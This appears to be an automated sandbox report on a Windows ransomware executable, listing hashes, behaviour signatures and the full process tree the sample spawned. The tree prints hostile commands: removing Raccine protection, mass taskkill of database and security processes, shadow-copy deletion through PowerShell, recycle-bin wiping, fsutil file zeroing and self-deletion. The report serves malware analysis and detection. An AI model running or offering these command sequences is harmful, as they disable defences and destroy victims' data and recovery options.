Resubmissions

18-01-2022 15:29

220118-sw4ecsbhen 10

29-10-2021 12:17

211029-pf6m1aaabk 10

Analysis

  • max time kernel
    110s
  • max time network
    122s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    29-10-2021 12:17

General

  • Target

    f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

  • Size

    133KB

  • MD5

    91b493febfc1d782875a09fc076a8850

  • SHA1

    ed12cfbedc90181e869fce19dc820063fa6b3179

  • SHA256

    f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327

  • SHA512

    bb66d4d65f8f615e6af06f4815233a2a7430373e4afc5a61a2b2fff0dc9a6a002b4edad0db2a336b24dabd65efc3b74f57985836d137f25eb87a1901cfa4b9a9

Malware Config

Signatures

  • Downloads MZ/PE file
  • Downloads PsExec from SysInternals website 1 IoCs

    Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
    "C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3140
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:428
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:420
      • C:\Windows\SYSTEM32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:3604
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3872
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:2132
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config FDResPub start= auto
            2⤵
              PID:2088
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SQLTELEMETRY start= disabled
              2⤵
                PID:1112
              • C:\Windows\SYSTEM32\netsh.exe
                "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                2⤵
                • Drops file in Windows directory
                PID:1072
              • C:\Windows\SYSTEM32\sc.exe
                "sc.exe" config SSDPSRV start= auto
                2⤵
                  PID:608
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                  2⤵
                    PID:64
                  • C:\Windows\SYSTEM32\sc.exe
                    "sc.exe" config SstpSvc start= disabled
                    2⤵
                      PID:2988
                    • C:\Windows\SYSTEM32\sc.exe
                      "sc.exe" config upnphost start= auto
                      2⤵
                        PID:840
                      • C:\Windows\SYSTEM32\sc.exe
                        "sc.exe" config SQLWriter start= disabled
                        2⤵
                          PID:3644
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1148
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4060
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM synctime.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1356
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM mydesktopqos.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2120
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM Ntrtscan.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:508
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM mysqld.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3572
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM isqlplussvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1392
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM sqbcoreservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:700
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM mydesktopservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2412
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM onenote.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1872
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM firefoxconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2776
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM encsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:380
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM tbirdconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3860
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM PccNTMon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2092
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM dbeng50.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2460
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM excel.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2060
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM agntsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1172
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM thebat64.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1216
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM msaccess.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2524
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM CNTAoSMgr.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1416
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM thebat.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1756
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM ocomm.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3940
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM outlook.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4072
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM steam.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1944
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM sqlwriter.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2864
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM infopath.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3692
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" IM thunderbird.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:3208
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM tmlisten.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2652
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM dbsnmp.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1040
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM wordpad.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:296
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM mbamtray.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1956
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM msftesql.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1656
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM xfssvccon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:800
                        • C:\Windows\SYSTEM32\taskkill.exe
                          "taskkill.exe" /IM mysqld-opt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2820
                        • C:\Windows\SYSTEM32\netsh.exe
                          "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                          2⤵
                            PID:380
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM zoolz.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:840
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM powerpnt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:836
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1720
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM ocautoupds.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1528
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM ocssd.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3544
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM visio.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3764
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4004
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM oracle.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1780
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM winword.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3192
                          • C:\Windows\SYSTEM32\arp.exe
                            "arp" -a
                            2⤵
                              PID:1468
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM sqlagent.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2648
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM mysqld-nt.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2704
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM sqlbrowser.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3708
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM sqlservr.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:700
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                              2⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2412
                            • C:\Windows\SYSTEM32\cmd.exe
                              "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                              2⤵
                                PID:3100
                              • C:\Windows\SYSTEM32\netsh.exe
                                "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                2⤵
                                  PID:1040
                                • C:\Windows\SYSTEM32\netsh.exe
                                  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                  2⤵
                                    PID:1244
                                  • C:\Windows\SYSTEM32\arp.exe
                                    "arp" -a
                                    2⤵
                                      PID:400
                                    • C:\Windows\System32\mshta.exe
                                      "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES !.hta
                                      2⤵
                                        PID:3572
                                      • C:\Windows\SYSTEM32\cmd.exe
                                        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                        2⤵
                                          PID:1884
                                          • C:\Windows\system32\PING.EXE
                                            ping 127.0.0.7 -n 3
                                            3⤵
                                            • Runs ping.exe
                                            PID:1456
                                          • C:\Windows\system32\fsutil.exe
                                            fsutil file setZeroData offset=0 length=524288 “%s”
                                            3⤵
                                              PID:4080
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
                                            2⤵
                                              PID:1780
                                              • C:\Windows\system32\choice.exe
                                                choice /C Y /N /D Y /T 3
                                                3⤵
                                                  PID:4092

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • memory/64-127-0x0000000000000000-mapping.dmp

                                            • memory/296-160-0x0000000000000000-mapping.dmp

                                            • memory/380-165-0x0000000000000000-mapping.dmp

                                            • memory/380-142-0x0000000000000000-mapping.dmp

                                            • memory/420-119-0x0000000000000000-mapping.dmp

                                            • memory/428-118-0x0000000000000000-mapping.dmp

                                            • memory/508-135-0x0000000000000000-mapping.dmp

                                            • memory/608-126-0x0000000000000000-mapping.dmp

                                            • memory/700-179-0x0000000000000000-mapping.dmp

                                            • memory/700-138-0x0000000000000000-mapping.dmp

                                            • memory/800-162-0x0000000000000000-mapping.dmp

                                            • memory/836-167-0x0000000000000000-mapping.dmp

                                            • memory/840-166-0x0000000000000000-mapping.dmp

                                            • memory/840-129-0x0000000000000000-mapping.dmp

                                            • memory/1040-159-0x0000000000000000-mapping.dmp

                                            • memory/1072-125-0x0000000000000000-mapping.dmp

                                            • memory/1112-123-0x0000000000000000-mapping.dmp

                                            • memory/1148-131-0x0000000000000000-mapping.dmp

                                            • memory/1172-147-0x0000000000000000-mapping.dmp

                                            • memory/1216-148-0x0000000000000000-mapping.dmp

                                            • memory/1356-132-0x0000000000000000-mapping.dmp

                                            • memory/1392-137-0x0000000000000000-mapping.dmp

                                            • memory/1416-150-0x0000000000000000-mapping.dmp

                                            • memory/1468-175-0x0000000000000000-mapping.dmp

                                            • memory/1528-168-0x0000000000000000-mapping.dmp

                                            • memory/1656-163-0x0000000000000000-mapping.dmp

                                            • memory/1720-169-0x0000000000000000-mapping.dmp

                                            • memory/1756-151-0x0000000000000000-mapping.dmp

                                            • memory/1780-173-0x0000000000000000-mapping.dmp

                                            • memory/1872-140-0x0000000000000000-mapping.dmp

                                            • memory/1944-154-0x0000000000000000-mapping.dmp

                                            • memory/1956-161-0x0000000000000000-mapping.dmp

                                            • memory/2060-146-0x0000000000000000-mapping.dmp

                                            • memory/2088-124-0x0000000000000000-mapping.dmp

                                            • memory/2092-144-0x0000000000000000-mapping.dmp

                                            • memory/2120-134-0x0000000000000000-mapping.dmp

                                            • memory/2132-122-0x0000000000000000-mapping.dmp

                                            • memory/2412-186-0x0000026525D60000-0x0000026525D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-139-0x0000000000000000-mapping.dmp

                                            • memory/2412-182-0x0000026525D60000-0x0000026525D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-181-0x0000026525D60000-0x0000026525D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-180-0x0000000000000000-mapping.dmp

                                            • memory/2412-184-0x0000026525D60000-0x0000026525D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-202-0x000002653FE16000-0x000002653FE18000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-201-0x0000026525D60000-0x0000026525D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-185-0x000002653FD70000-0x000002653FD71000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2412-183-0x0000026525D60000-0x0000026525D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-187-0x0000026525D60000-0x0000026525D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-188-0x000002653FFA0000-0x000002653FFA1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2412-189-0x0000026525D60000-0x0000026525D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-191-0x000002653FE10000-0x000002653FE12000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-193-0x000002653FE13000-0x000002653FE15000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2460-145-0x0000000000000000-mapping.dmp

                                            • memory/2524-149-0x0000000000000000-mapping.dmp

                                            • memory/2648-176-0x0000000000000000-mapping.dmp

                                            • memory/2652-158-0x0000000000000000-mapping.dmp

                                            • memory/2704-177-0x0000000000000000-mapping.dmp

                                            • memory/2776-141-0x0000000000000000-mapping.dmp

                                            • memory/2820-164-0x0000000000000000-mapping.dmp

                                            • memory/2864-155-0x0000000000000000-mapping.dmp

                                            • memory/2988-128-0x0000000000000000-mapping.dmp

                                            • memory/3100-203-0x0000000000000000-mapping.dmp

                                            • memory/3140-117-0x000000001B260000-0x000000001B262000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3140-115-0x00000000005D0000-0x00000000005D1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3192-174-0x0000000000000000-mapping.dmp

                                            • memory/3208-157-0x0000000000000000-mapping.dmp

                                            • memory/3544-170-0x0000000000000000-mapping.dmp

                                            • memory/3572-204-0x0000020A5C348000-0x0000020A5C350000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/3572-136-0x0000000000000000-mapping.dmp

                                            • memory/3604-120-0x0000000000000000-mapping.dmp

                                            • memory/3644-130-0x0000000000000000-mapping.dmp

                                            • memory/3692-156-0x0000000000000000-mapping.dmp

                                            • memory/3708-178-0x0000000000000000-mapping.dmp

                                            • memory/3764-171-0x0000000000000000-mapping.dmp

                                            • memory/3860-143-0x0000000000000000-mapping.dmp

                                            • memory/3872-121-0x0000000000000000-mapping.dmp

                                            • memory/3940-152-0x0000000000000000-mapping.dmp

                                            • memory/4004-172-0x0000000000000000-mapping.dmp

                                            • memory/4060-133-0x0000000000000000-mapping.dmp

                                            • memory/4072-153-0x0000000000000000-mapping.dmp